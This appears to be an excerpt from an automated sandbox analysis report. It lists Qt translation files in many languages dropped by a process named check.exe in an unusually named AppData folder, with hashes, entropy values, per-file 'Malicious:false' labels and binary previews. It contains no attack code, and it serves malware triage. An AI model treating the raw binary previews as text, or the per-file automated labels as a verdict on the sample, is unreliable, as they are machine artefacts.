                                                                                                                                                                                                            SHA-512:D8E1A3B3732662BA572A1387651F2625742710834BEDB41809DA47B5D23020AA1B558B64A00C10C605D1844F0544483163F4A6227CAFFA5ECDABF3BBF4E12D9B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gl_ESB...8.(.......0T......Uj......`.....`.a[....F..........t..............1"... S.39.......s...!.............'F.........B<s...8..MQ.. ...........J..&S.0.....x.O5Q......)Q...O..o>...{.......#...J..&.......$....t.....8dz..%..D ......k.A.....k.A.......n.......I.................."...21....................G...#...w............[...!...?...........Q...?........$a....v.6.>..........$...K...........%0._Xa......GA...n..........~.......TH..#..K.H..$M.........pA...Z......'..P.~...B.o........(..........#+..~......s.1.....o....!..z.q...e.............................. ..e....wi..((......(.A. .r.a.z...n. .d.i.s.t.o. .p.o.d.e. .s.e.r. .q.u.e. .a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n.d.a. .e.s.t.e.a. .a. .i.n.d.e.x.a.r.s.e...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....*.R.e.s.u.l.t.a.d.o.s. .d.a. .p.r.o.c.u.r.a..........Search Results.....QCLucene
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10284
                                                                                                                                                                                                            Entropy (8bit):4.674501432335502
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:RNY+rCG3e7LBqYqYseBb/FEWBgSn62TdJgDO9esYGY3DtgGh621XlZ/8kWvIMK:4+rheHYYZdBb/pgSn62T/FeVD3DGGh62
                                                                                                                                                                                                            MD5:5A56E9E2ED6ECE3F249D1C2A7EB3B172
                                                                                                                                                                                                            SHA1:D6F079F40FBB813B0293C1D2210BAE7084092FEC
                                                                                                                                                                                                            SHA-256:70F33B569C2942F41C6D634EA6A61CB8D80EB2C7011BAD48EF6DBAE9677960D5
                                                                                                                                                                                                            SHA-512:28947128FC51791CFDBFD3958FAF9B33979DB52C90AE0159EDB01FE6032284EB37BC05187162983A0435560BCEA864B008F499CDB4CE662792599FE20A37972A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......hu_HUB...(.(.......0T......5w......Uj......`.....4.a[....N..........t....".........39..........%..........B<s...8..M^...8..........J..$..O5^......)^...]..o>.......J..$......."N...t.....8dz..#g.D ......k.N...>.k.N.......n.......I..............2>..........a.........G...!...w.......................,................^............$a......6.>.........."...K....m......"..W.b...l._Xn...~..GN......~.......TH..!F.!.......K.H..!..........pN..........%..P.~...<.o........(.......... ...~......s.>...{.o.....c.z.q...K.......v......l.........h.... ........t..e....mi..%.....~.(.E.z. .a.m.i.a.t.t. .l.e.h.e.t.,. .h.o.g.y. .a. .d.o.k.u.m.e.n.t...c.i... .m...g. .i.n.d.e.x.e.l...s. .a.l.a.t.t. .v.a.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......M.e.g.j.e.g.y.z...s.:..........Note:.....QCLuceneResultWidget.....&.K.e.r.e.s...s.i. .e.r.e.d.m...n.y.e.k..........Search Results.....QCLuceneResultWidget.......A
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10612
                                                                                                                                                                                                            Entropy (8bit):4.458970627057882
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:nRxcfy71b+myBN16cbc+w45rtlTnzo7uHp3JQJ9cVu4BJ1G82g33vOVrNL/7nEF1:RR4R/fJn9JizTgnqrNL/b0hH2K
                                                                                                                                                                                                            MD5:3639B57B463987F6DB07629253ACD8BF
                                                                                                                                                                                                            SHA1:65935A67C73F19FCF6023FB95030A5ACAF9DA21C
                                                                                                                                                                                                            SHA-256:316FE8D0815E2B4B396895BEB38EF1A40431915B5E054DF80F4C0CD556F26E4B
                                                                                                                                                                                                            SHA-512:AD7CA93D93A69F273CE80BE7F2F477543B9C5F9C7E4D7448223BFF084EA956B626D6837F22D83C5E282688B938F58C29073C4B5C6F26A797F716C14FABF9FFEE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......it_ITB...(.(.....g.0T....y.5w... ..Uj....2.`.......a[............'..t..............39..........&..........B<s...j..M^...h......K...J..%..O5^...K..)^......o>...u...J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>.................o..G..."...w............-......./..,................^...'........$a......6.>..........#...K...........$..W.b....._Xn......GN......~.......TH.."n.!.....5.K.H..#"......>..pN..........&..P.~.....o.....~..(....p.....!...~....A.s.>.....o.... ..z.q..........................q.h....!0.......*..e....;i..'!......(.L.a. .c.a.u.s.a. .d.i. .c.i... .p.o.t.r.e.b.b.e. .e.s.s.e.r.e. .c.h.e. .l.'.i.n.d.i.c.i.z.z.a.z.i.o.n.e. .d.e.l.l.a. .d.o.c.u.m.e.n.t.a.z.i.o.n.e. ... .a.n.c.o.r.a. .i.n. .c.o.r.s.o...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.......R.i.s.u.l.t.a.t.i. .d.e.l.l.a. .r.i.c.e.r.c.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7917
                                                                                                                                                                                                            Entropy (8bit):5.680408580146589
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mP6J37GcBzRjYEPEJJGTnwfJJxb7FTPjzzZBL3/q/I53:mSVqclR5s6Tnwfb7Pj/PL3/q/w3
                                                                                                                                                                                                            MD5:1380A9352C476071BDA5A5D4FED0B6C5
                                                                                                                                                                                                            SHA1:9B737ED05F80FE5D3CD8F588CCEC16BB11DD3560
                                                                                                                                                                                                            SHA-256:AE603B2C0D434D40CDE433FFCBA65F9EE27978A9E19316007BE7FE782A5B8B47
                                                                                                                                                                                                            SHA-512:EC3D68126488C3A163898BACAF7E783217868573635182CAF511ED046B4BE1F99A71FBB24DA607CCB50EDAF70893007AAEE9A6BAAE4C1CD33465A0915AA965DA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......jaB...(.(.....S.0T......5w....'.Uj......`.......a[............u..t............!.39.....................B<s......M^..............J...>.O5^...O..)^......o>.......J...............t...w.8dz.....D ......k.N.....k.N...H...n.......I...........i..2>...<......G......9..G....P..w............i..........,................^..........'.$a......6.>...5..........K............S.W.b...2._Xn......GN...@..~.......TH.....!.......K.H.............pN...........S.P.~.....o.....|..(..............~....o.s.>.....o.......z.q..................@.........h.....&....... ..e.....i........@.(0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0K0.0W0.0~0[0.0..).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..:..........Note:.....QCLuceneResultWidget......i.}"}Pg...........Search Results.....QCLuceneResultWidget.....R0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0.i.}"}Pg.0LN.[.Qh0jS..`'0L0B0.0~0Y0..........VThe search results may
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5708
                                                                                                                                                                                                            Entropy (8bit):5.698914195742074
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:elPQHJ6L4c7LaQaFQv2QEhBL+Ejma0W40U0BzlQlcrnUSaTIdspIc18CLRSM3LBY:dHI97W1BbNz1VqqzJpoj5y5uY7OGrWFE
                                                                                                                                                                                                            MD5:CD15674A652C2BF435F7578E119182F8
                                                                                                                                                                                                            SHA1:AEA22E4A0D21396733802C7AB738DDD03737B7D6
                                                                                                                                                                                                            SHA-256:F11C64694E8E34E1D2C46C1A1D15D6BA9F2DB7B61DE4FDF54ECA5AB977C3E052
                                                                                                                                                                                                            SHA-512:88BFA112F4DBC0BFB4013CE0937E5180B4AB4A217FC8A963798C7C86532E794E4A1AD88416AE42F26A1C0631B465A5D69BFE75366E048502F5E21F4115A12F19
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......koB............%.......0T......K:^...g.Uj......`........YJ...>.E.4...........z...>..........;.B<s...K.B\>...b........+.s.....zq....[..9....F..vR......@.......@.......:....c.8Z......g.N...7..F....|...........t.....D ......k.N.......I...m..^......`#....!..2.......G....@...N.................................X..K....{.......i..GN......NO.............K.H..........S..pN...z..V...............................>...........:.~.....i..%c.....z.q....i...s......D.0. .............Add Filter.....FilterNameDialogClass.......D.0. .t...:..........Filter Name:.....FilterNameDialogClass........... ...L..........Untitled.....QHelp.....(...L... ...|.D. .....`. ... ...L.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....".....0...|. .... ... ...L.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....2...|. .%.1... ...x. .L.t...D. .... ... .................&Cannot create index tables in file %1......QHelpCollectionHandler.....,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9673
                                                                                                                                                                                                            Entropy (8bit):4.622652249027856
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:TO/7kBL9wGu3wtCnlhLJUBB7oph+mZ18LgP:T8QnwcCnlhdvphpZ18LgP
                                                                                                                                                                                                            MD5:2B68446B69D9AA40B273D75A581D2992
                                                                                                                                                                                                            SHA1:8A09BD38998543B74E2673478EDD54FB4BBDD068
                                                                                                                                                                                                            SHA-256:CC6CB4D8C54086224672F2E49E623C8CB7C0C1CD65B8D5ECD42FC9BA3A6065BD
                                                                                                                                                                                                            SHA-512:F3A3D6A416B3411613B06FC3EE56625D4D4DE80087182AB0D0601E49314861ABEF97D11A15B4C0511911544A59FBC4A4A52F0CCF0FD43F763A76A8922D8E57B6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......plB.....(.......0T....T.5w......Uj... R.`.......a[...............t............2.39....H......6.......n.B<s.. ...M^..._......6.O5^...F..)^......o>...............t.....D ......k.N.....k.N.../...n.......I...W..........2>...w................G.......w............&.......:..,................^...(..... ..$a....?.6.>...$..........K......W.b....._Xn......GN...Y..~......!.....*.K.H...E....."...pN...-.........P.~...}.o........(....1..~......s.>......%c.."..o.....r.z.q............................h................e.....i..#.......N.i.e.n.a.z.w.a.n.y..........Untitled.....QHelp.....P.N.i.e. .m.o.|.n.a. .s.k.o.p.i.o.w.a... .p.l.i.k.u. .z. .k.o.l.e.k.c.j...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....>.N.i.e. .m.o.|.n.a. .u.t.w.o.r.z.y... .k.a.t.a.l.o.g.u.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....H.N.i.e. .m.o.|.n.a. .u.t.w.o.r.z.y... .t.a.b.e.l. .w. .p.l.i.k.u. .%.1........... Cannot create tables in file
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7288
                                                                                                                                                                                                            Entropy (8bit):5.297177914619657
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:dBJjvfq7D6X68uBAzlp5W9+yBPZZZMM7vL0PXJL:JKrMEL0PXJL
                                                                                                                                                                                                            MD5:794AF445A5D7082D51BD22683449F86D
                                                                                                                                                                                                            SHA1:3A0C369872B112A1572AA17EEB814B168B225D98
                                                                                                                                                                                                            SHA-256:557B644E6DA5F1EC720EF93965617087E4D1F40B2494CC5AA524CF3796108DE7
                                                                                                                                                                                                            SHA-512:D42C870A16AEE7626BBE24886AD423895529A2F1A51AC2DBC303BC0E4EF9D3241FE894ECA3F7217AD408C8DCEE165CA4B89D84570357B0EB80340A3F72B0A846
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ruB..........\.%.......0T......K:^.....Uj....L.`........YJ...X.E.4...............>............B<s.....B\>............+.s.....zq.......9....B..vR...L..@.......@....G..:......8Z......g.N......F....>...........t.....D ....R.k.N...E...I...W..^......`#....s..2.......G....^...N.........................K.......d..K............O..GN...b..NO.............K.H.............pN...P..V....................g..........>.............~........%c.....z.q....i........$...>.1.0.2.;.5.=.8.5. .D.8.;.L.B.@.0..........Add Filter.....FilterNameDialogClass.........<.O. .D.8.;.L.B.@.0.:..........Filter Name:.....FilterNameDialogClass.........5.7.K.<.O.=.=.K.9..........Untitled.....QHelp.....b...5. .C.4.0.;.>.A.L. .A.:.>.?.8.@.>.2.0.B.L. .D.0.9.;. .:.>.;.;.5.:.F.8.8. .A.?.@.0.2.:.8.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....<...5. .C.4.0.;.>.A.L. .A.>.7.4.0.B.L. .:.0.B.0.;.>.3.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....`
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10388
                                                                                                                                                                                                            Entropy (8bit):4.70568613551943
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:uPq7iBWseXKkVu4+Qv9zEJ1xGMaLNmBgJqdC6/MxIMt:LWcseV04Xv9zEoLNDJqdX/MxRt
                                                                                                                                                                                                            MD5:75C94E59F1FC5312AE25381C247AF992
                                                                                                                                                                                                            SHA1:E3E5F4582CC5FAFE6DF43644D11484861023C084
                                                                                                                                                                                                            SHA-256:F41E33E1D790BD0D3EB180F1F875BC191FE74773628F25C2CAD95E1402E66867
                                                                                                                                                                                                            SHA-512:959B8F4D57FC9728DD4804322333D1792D45A0EE85615B559E0CA3BD2DEA22E2C8C68C6482AE9425D29C819B0ED27473EDDC82EF4B6ECFFB2E2E7B56E1509B63
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......sk_SKB...8.(.......0T......Uj......`.....0.a[....8..........t..............1"......39.......s........... .....%..........B<s...6..MQ..............J..$-.0.......O5Q......)Q...;..o>...........G...J..$......."....t.....8dz..#..D ......k.A...2.k.A.......n..._...I.................. ...21..........e.........G...!...w....Y...........!...........=...Q............$a......6.>.........."...K....i......# ._Xa..."..GA..............~.......TH..!{.K.H.."7.........pA..........%..P.~.....o........(..........!...~....u.s.1.....o.......z.q...c..............................f..e....9i..&-......(.D...v.o.d.o.m. .m...~.e. .b.y.e. .t.o.,. .~.e. .d.o.k.u.m.e.n.t...c.i.a. .s.t...l.e. .n.i.e. .j.e. .z.i.n.d.e.x.o.v.a.n.....).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......P.o.z.n...m.k.a.:..........Note:.....QCLuceneResultWidget.....".V...s.l.e.d.k.y. .h.>.a.d.a.n.i.a..........Search Results.....QCLuceneResultWidg
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10363
                                                                                                                                                                                                            Entropy (8bit):4.613473842638716
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:vNBqTi7qBCVIQf54EslZ2Jy/L/BnmpP0bX3caK6q1B6/hgIlCCUb0:vjq2+UVT4ESZOYmpP0bX26q1I/yqCCUw
                                                                                                                                                                                                            MD5:3B0AEE27B193A8A563C5CB5C7C4FE60F
                                                                                                                                                                                                            SHA1:C94E832595EC765370553468F87C02DB7E7D138A
                                                                                                                                                                                                            SHA-256:2EC955E662407EBCD8DCDAE5AAA21E4108E0B5B0AEE0E9DB712C27072943535F
                                                                                                                                                                                                            SHA-512:EBC25C378126876F44279E23CA0CF06FC9E7D5F51AD7E3DBDABA7A50C81112EDC1C76F7FD0AF47E447A93C3593BB953A0C9C1FBBFC49494E6B29BF21655F690E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......slB...8.(.....E.0T......Uj......`.......a[............!..t..............1"....;.39.......s....^............$........i.B<s...,..MQ..........}...J..#..0.....Z.O5Q...[..)Q......o>...............J..$I......"W...t...C.8dz..#H.D ......k.A.....k.A.......n.......I.................. P..21....................G...!...w............?...!...3...........Q...+........$a....>.6.>.........."...K...........".._Xa......GA..............~....A..TH..!I.K.H..!..........pA...>......%..P.~...>.o........(....d..... ...~......s.1.....o.......z.q.....................................e....{i..&.....z.(.R.a.z.l.o.g. .j.e. .m.o.r.d.a. .t.o.,. .d.a. .s.e. .d.o.k.u.m.e.n.t.a.c.i.j.o. .a.e. .v.e.d.n.o. .i.n.d.e.k.s.i.r.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......O.p.o.m.b.a.:..........Note:.....QCLuceneResultWidget.....".R.e.z.u.l.t.a.t.i. .i.s.k.a.n.j.a..........Search Results.....QCLuceneResultWidget.......R.e.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4629
                                                                                                                                                                                                            Entropy (8bit):4.68793836539357
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:BoiK0UD2wMLb7Lqlguotqbww5BLNwWjK0kHU9zuQlUVUfniqthweEIFwC18lLEGA:PXFf7pU75BWWOpcJcVqDFNz8brgyf76r
                                                                                                                                                                                                            MD5:32D6EE3D8EE6408A03E568B972F93BCB
                                                                                                                                                                                                            SHA1:582EE079DBD42000C378E0701D26405750524DBA
                                                                                                                                                                                                            SHA-256:EBDECA0CFEE7A9441DEB800BABFD97C63BC4E421DA885C55B3BD49725EBACD25
                                                                                                                                                                                                            SHA-512:24AAA30B9CB4DB82A57411FBA24A87D70D8B845AE48A6FDA633D0BE6B824B58FDD2F450C2B385F16F49E2F9C6FA0A3124FD0F28594726940F996C66F8F3216CC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......tr_TRB.....%.....[.0T......Uj......`.....$..............L.B<s.....B\>..........4.+.s...............t.....D ......k.N...5...I......2.......G....5...N..........a...............f..K....9..........GN...........@.K.H..........q..pN...t..........>...z.~...../..%c.....z.q....i..........B.a._.l.1.k.s.1.z..........Untitled.....QHelp.....J.K.o.l.e.k.s.i.y.o.n. .d.o.s.y.a.s.1. .k.o.p.y.a.l.a.n.a.m.1.y.o.r.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....2.D.i.z.i.n. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....\.%.1. .d.o.s.y.a.s.1.n.d.a. .d.i.z.i.n. .t.a.b.l.o.l.a.r.1. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r...........&Cannot create index tables in file %1......QHelpCollectionHandler.....N.%.1. .d.o.s.y.a.s.1.n.d.a. .t.a.b.l.o.l.a.r. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r........... Cannot create tables in file %1......QHelpCollectionHandler.....P.S.q.l.i.t.e. .v.e.r.i.t.a.b.a.n.1. .s...r...c...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9750
                                                                                                                                                                                                            Entropy (8bit):5.281035122342072
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:eMp79BCN+u8hhbHbny+HJouHgei50JBSfDvbetpP/RIkT:eIhgNgBbny+phiS3SfDDetpP/RRT
                                                                                                                                                                                                            MD5:90A776917D534B65942063C319573CDC
                                                                                                                                                                                                            SHA1:5DF3B213D985A3BBDB476B37B7780D7D7DF17E41
                                                                                                                                                                                                            SHA-256:497CFC473684692EE44D7A3795E8FB2270C57069FD9EB98A615DD29AB9BE8A7C
                                                                                                                                                                                                            SHA-512:B34A019716B50CE8E1E20AC32756B3B0D5802971F7A04F4BDDE2418DA551AFB9742B79E934979DB6FAB9DAC05D7D26A3B19ABA77158321F8D9AAB08AEBBD455A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......uk_UAB...(.(.....?.0T......5w......Uj......`.......a[...............t............K.39....u....."..........B<s...8..M^...j......y...J..!..O5^...Y..)^......o>...o...J..":...... <...t...E.8dz..!3.D ....".k.N.....k.N...d...n.......I..............2>...>......o.........G.......w............E.......e..,................^...S........$a......6.>...'...... y..K........... ..W.b....._Xn......GN...p..~.......TH...4.!.....9.K.H.............pN..........#].P.~...~.o.....N..(....b.........~......s.>.....o.....o.z.q..........................U.h.............D..e.....i..#.......(...@.8.G.8.=.>.N. .F.L.>.3.>. .<.>.6.5. .1.C.B.8. .B.5.,. .I.>. .4.>.:.C.<.5.=.B.0.F.V.O. .4.>.A.V. .V.=.4.5.:.A.C.T.B.L.A.O...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........@.8.<.V.B.:.0.:..........Note:.....QCLuceneResultWidget.....". .5.7.C.;.L.B.0.B.8. .?.>.H.C.:.C..........Search Results.....QCLuceneResultWidget....... .5.7
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6441
                                                                                                                                                                                                            Entropy (8bit):5.790303416386852
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:pB37nBD4H5PCyLDxLSzJPduYx9vja/FIgH9yIFqfs:rTZ4HUAD1S1JFe/F59PFqfs
                                                                                                                                                                                                            MD5:9297A6905B8B1823BF7E318D9138A104
                                                                                                                                                                                                            SHA1:3DB992A1B3BBCAF314B7EA4A000D6334D7492A52
                                                                                                                                                                                                            SHA-256:C02AAA20923F18ADDAB520BE5CB84EFD4C723396BDC24B4C9A72D406F101C7B4
                                                                                                                                                                                                            SHA-512:01F12CEE0AE456D78942A6049E1C77F94B406C8FFB4A5944DE15E54D1C760CDBA13279530A8F29B1443D1BBC647D3AF5436AAD8C43EB3944316C48300B3827E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zhB......I....L.0T......Uj......`.......a[...............t....P..@....Z.......<.........39.......s....2.................B<s......MQ..........9...J......31.....0.......O5Q......)Q...^..o>...........(...........J...V...........t.....8dz.....D ....Z.k.A.....k.A.......n.......I...........t..w................!...........o.......D...Q...E........$a......6.>...h...............%._Xa......GA..........._..TH...r.........pA.............P.~.....o.....].~.q.............~......o.....h.z.q...........H..0q....................i........2..S.u...y.`.Q.v.S.V.S..f/V.N:..e.hckcW(..}"_.0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..............Note:.....QCLuceneResultWidget......d.}"~.g...........Search Results.....QCLuceneResultWidget.....,d.}"~.g.N_..^vN.[.et..V.N:..e.hckcW(..}"_............VThe search results may not be complete since the documentation is still being indexed!.....QCLuceneResultWidget..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9301
                                                                                                                                                                                                            Entropy (8bit):5.80411750798786
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:4bgIXwsL78BQp4dRDP0ludqODa/wkB/tTWn5dJ6mO8IZiT9Dzz/wI3HyRWqUqS:lI/oS4dR5c/tTWn5/EZA9D/w+H8WqUqS
                                                                                                                                                                                                            MD5:47C3328D3918CF627112BB6C50E30B86
                                                                                                                                                                                                            SHA1:05705603AB3F28402A6C103E1C41DDFF21D140C0
                                                                                                                                                                                                            SHA-256:3697F1660D7F2AC9B37AC33CD1C7ECAE08ADBD26710E7E0076497CCDDC8BC830
                                                                                                                                                                                                            SHA-512:8DE1C3C5A48965CF6D8AA545DA9F0A5C00AE124F3E4153597915E7C0F4CAE1E26723270F58A47AA9FFA4AAF30E6EBA522D4EBAD27DECF17EF108E353E611980E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zh_TWB......I....[.%.......0T......0T......Uj......Uj....R.`.....>.a[....................g..t....7..@......................39.......s................... .........B<s.....B<s.....B\>......MQ..........[...J...]..31.....+.s...c.0.....U.O5Q......)Q...C..o>.......................J...............t...3...t.....8dz.....D ....R.D ......k.A.....k.A.....k.N...'...n.......I.......I...........[..2....x..G........N......w................!...........:...........Q...&...............$a......6.>...I.......L.......$..K......................_Xa...y..GA...O..GN...........$..........TH...I.K.H................ Y..pA...K..pN.............P.~.....o.....D.~.q......>.............~......~........%c.. ..o.....!.z.q...........#..0q....................i..!Y....(..g.S..f/V.p.N.W(^.z.e.N.v.}"_.uvN-0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......P..;............Note:.....QCLuceneResultWidget......d.\.}Pg...........Sea
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):146
                                                                                                                                                                                                            Entropy (8bit):3.6255640074603277
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/IrLlAlHekfK/gp1MUXaMlI+rwtbWlMiayIPldkOgn:CwDrC+TYIUrIRt6HoiHn
                                                                                                                                                                                                            MD5:5A46979B45C67DD6312F33CCEA2ED7BC
                                                                                                                                                                                                            SHA1:4C56836B1FB10D9903B299CBCB925947D515B4C8
                                                                                                                                                                                                            SHA-256:BB246AABD501E14CED8B1FFC1369E3D5D26567AAE62B3EAD4D94C22FB77C3471
                                                                                                                                                                                                            SHA-512:BDBA4E1731CF254E95B0F1337410937C765E96FBB1D42F1D053033E1511FEE6F50C02705F781F4DAA0347E2299DC78A5A9942AC4EA343ED1F8F401F9ACD961E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......hu....v.....q.t.b.a.s.e._.h.u.....q.t.s.c.r.i.p.t._.h.u.....q.t.m.u.l.t.i.m.e.d.i.a._.h.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.h.u
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.5752972123113778
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/EbFlAlHeke5zOp1MUWLt7KlI+rwtbWlMj5FKIPldkOA9kk:CwDM+35aIUW5SIRt6Q50oi9Gk
                                                                                                                                                                                                            MD5:2BB8C94D420D3BC344C79A01043BDC89
                                                                                                                                                                                                            SHA1:3FBA773D58E6D3699C20AB41AEE6801E71E2DDAE
                                                                                                                                                                                                            SHA-256:9117AAC2D07BC86DFA55A29B8825ED27C7093300FCC90E143E135E00E85F09D7
                                                                                                                                                                                                            SHA-512:C6B13655AFB206B0056F5656B4A9BF33CC267FCC928F6973258131CFA6443970510226FE45A041E5AA988809E17D0B11C7458F4A241C71521EDED186596C6055
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......it....v.....q.t.b.a.s.e._.i.t.....q.t.s.c.r.i.p.t._.i.t.....q.t.m.u.l.t.i.m.e.d.i.a._.i.t... .q.t.x.m.l.p.a.t.t.e.r.n.s._.i.t.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):146
                                                                                                                                                                                                            Entropy (8bit):3.599979504080125
                                                                                                                                                                                                            Encrypted:false
